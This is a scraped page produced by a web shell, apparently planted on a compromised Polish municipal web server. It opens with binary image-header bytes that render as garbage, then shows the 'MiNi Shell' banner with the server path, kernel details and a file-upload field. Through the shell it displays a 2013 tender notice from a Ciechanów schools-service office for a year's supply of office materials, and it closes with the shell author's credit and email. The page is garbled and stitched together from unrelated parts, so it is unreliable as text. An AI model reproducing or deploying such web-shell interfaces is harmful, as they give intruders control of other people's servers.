JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130522/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130522/199432-N-2013.html

<p class="kh_header"><b>Ciechanów: Dostawa  materiałów biurowych dla Zakładu Obsługi Szkół i Przedszkoli w Ciechanowie</b><br>
<b>Numer ogłoszenia: 199432 - 2013; data zamieszczenia: 22.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Obsługi Szkół i Przedszkoli w Ciechanowie , ul. Jesionowa 27, 06-400 Ciechanów, woj. mazowieckie, tel. 0 23 673 72 72, faks 0 23 673 72 72 wew. 31.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  materiałów biurowych dla Zakładu Obsługi Szkół i Przedszkoli w Ciechanowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Całoroczna dostawa materiałów biurowych :   
1.	Papier do kserokopiarki A-4 (80g/m2)	                                                            500ryz  
2.	Papier do kserokopiarki A-3 (80g/m2)	                                                              20ryz	 
3.	Segregator duży A-4 70 (dolna krawędź wzmocniona listwą )    	   300szt
4.	Segregator duży A-4 50 (dolna krawędź wzmocniona listwą)   	                 150szt	 
 5.	Koperta biała  C-6 z klejem	                                                                        3000szt	 
 6.	Koperta biała  C-5 z klejem	                                                                        1500szt	 
 7.	Koperta biała  C-4 z klejem	                                                                        2000szt  
8.	HP D5360   kolor oryginał		                                                                5szt	 
 9.	HP  D5360   czarny oryginał	                                                                             10szt	  
10.         HP  D5360    czarny regenerowany                                                                        20szt 
11.         HP D5360     kolor regenerowany                                                                          15szt 12.	HP  6652A    hp845/840  kolor regenerowany		                                    3szt	  13.	HP  6615D    hp845/840 czarny regenerowany                                                     5szt	   14.	toner HP P2055 regenerowany		                                                                4szt   15.	HP   33  hp 5940   regenerowany	                                                                 7szt	  16.	HP  334  hp 5940 regenerowany                                                                              10szt	  17.	HP Q2613A   hp1300  regenerowany	                                                               10szt	  18.	HP Q2612A  hp1010 regenerowany		                                                10szt	  19.	HP Q5949A hp1320  regenerowany                                                                        8szt	 20.         Hp 1018 regenerowany                                                                                             7szt
21.         Hp 2015n regenerowany                                                                                           7szt	  22.	Toner kyocera   TK 320 regenerowany	                                                                 5szt	  23.	Toner Kyocera Mita KM 1620 regenerowany                                                        6szt	  24.	Skoroszyt kartonowy zwykły	                                                                           280szt	  25.	Skoroszyt plastikowy	                                                                                         200szt	  26.	Teczka wiązana kartonowa	                                                                           250szt	  27.	Teczka wiązana plastikowa	                                                                           200szt	  28.	Koszulki do pism A-4 ( 120?m)	                                                                         1000szt	  29.	Blok makulaturowy notatnik A-4 (kratka)	                                                 30szt	  30.	Blok makulaturowy notatnik A-5 (kratka)	                                                 50szt	  31.	Kwitariusz numer. w zes.A-4			                                                   12bl	  32.	Polecenie przelewu A-6		                                                                                60bl	  33.	Kasa przyjmie A-6	                                                                                              60bl	  34.	Kasa wypłaci A-6	                                                                                              60bl	  35.	Raport kasowy A-5	                                                                                              50bl   36.         Zamówienie ogólne A-5                                                                                                8bl	  37.	Korektor pisakowy (materiał końcówki stal nierdzewna,                                           rozmiar linii korygowania od 0.8mm do 1.2mm,pojemność                                             od 6ml  do 10ml  , rodzaj tuszu olejowy)	                                                  50szt	  38.	Korektor  w myszce  (długość taśmy  od 5m do 8m,szerokość 5 mm)             100szt	  39.	Klej kulkowy wyposażony w metalową kulkę do nanoszenia                                           kleju pojemność od 40 ml do 60 ml, kolor transparentowy   	                      80szt	  40.	Spinacze biurowe metalowe małe28mm (op.100szt)	                                   400op	  41.	Spinacze biurowe metalowe duże50mm  (op.100szt)	                                   200op	  42.	Zszywki 24/6 (op.1000szt)	                                                                              250op  43.         Ołówki biurowe zwykłe                                                                                               40szt	  44.	Ołówki automatyczne z gumowym uchwytem i przyciskiem z boku ,                                                  grubość grafitu 0.5mm	                                                                                              25szt  45.	Gryfie do ołówka aut. 0.5   2B(op.12szt)                                                                  30op	  46.	Dyskietka DLP 3.5  (op.10szt)                                                                                       10op	  47.	Rolka Delton 5.7 mm (Taśma kasowa  papierowa                  o szerokości 57mm długości minimum 25m)		                                    150szt	  48.	Piórko kulkowe rozmiar kulki 0,5mm,zawartość tuszu od 1.4g do  1,6g            50szt  49.	Płyty  cd-rom	                                                                                                           100szt	  50.	piórko kulkowe(np.sx-217) - szybkoschnący tusz pigmentowy, 
              wodoodporny  i odporny ma blaknięcie doskonały do pisania po śliskim 
              papierze np. faktury, papier kredowy, nie rozmazuje się, nie blaknie pod
              wpływem światła, ani nie przesiąka przez papier; średnica kulki  0,7 mm,
              grubość linii pisma ok. 0,35 mm; wymienny wkład 	                                     30szt  
51 .         Wkład do piórka kulkowego  (np.sx-217)                                                              150szt                                                52 .	Opakowanie plas. do płyt	                                                                               100szt	  53.	Kostka  kolorowa 85x85 (bez klejowa)		                                                   150szt	  54.	Kostka  samoprzylepna 51x38		                                                                 150szt	  55.	 Kostka  samoprzylepna 105x76		                                                                  150szt	  56.	Kostka   85x85 (bez klejowa)	                                                                                150szt	  57.	HP Color LaserJet CP1215  regenerowany:
               ( CB541A,CB540A,CB543A,CB542A)                                                                            12szt  58.          Długopis  z szybkoschnącym tuszem na bazie oleju ,                                                   na wkłady wymienne , długość linii pisania od 1600m do 1800m ,                                                  grubość linii pisania od 0.25mm do 0.30 mm                                                         30szt  59.           Gumka ołówkowa (duża)                                                                                            15szt   60.           Karton wizytówkowy A-4 230g/m2                                                                            10op   61.           Koszulki z klapką (op.10szt)                                                                                         10op   62.           Skoroszyt z klipsem (op.10szt)                                                                                    10op   63.           Naboje do pióra   parkier  (op.5szt)                                                                       10op   64.           kostka samoprzylepna  76x76                                                                                     25op   65.           Klipsy  biurowe 25 mm (12szt)                                                                                    30op   66.           Klipsy biurowe   41 mm (12szt)                                                                                   30op                                                                                      67.           HP Office Jet Pro 6500a czarny  oryginał	                                                         8szt
68.           HP Office Jet Pro 6500a kolor   oryginał                                                                      6szt    69.           Canon Pixma MP280 czarny   regenerowany                                                             5szt  70.           Canon Pixma MP280 kolor  regenerowany                                                                 3szt   
71.           HP Deskjet 3525  Advantage 
                      Black - (Cz109AE)         oryginał                                                                                                                             8szt
                      Magenta - (Cz111AE) oryginał                                                                                                                            3szt
                      Yellow - (Cz112AE)       oryginał                                                                                                                            3szt            
                      Cyan - (Cz110AE)           oryginał                                                                                              3szt
72.        HP LaserJet Pro 300 Color M351a 
                CE410A - oryginał                                                                                                            4szt
                CE411A - oryginał                                                                                                            2szt
                 CE413A -  oryginał                                                                                                            2szt
                CE412A -  oryginał                                                                                                            2szt.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez wykonawcę   realizacji co najmniej 3 dostaw o wartości jak  w  SIWZ  w zakresie zaopatrywania w artykuły biurowe i eksploatacyjne  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Potwierdzonych referencjami zamawiających o należytej staranności ich wykonania</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez wykonawcę - Opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego , że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 50000zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zosipciechanow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Obsługi Szkół i Przedszkoli 
ul.Jesionowa 27 
06-400 Ciechanów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.06.2013 godzina 12:00, miejsce: Zakład Obsługi Szkół i Przedszkoli 
ul.Jesionowa 27 
06-400 Ciechanów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 03.07.2013.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com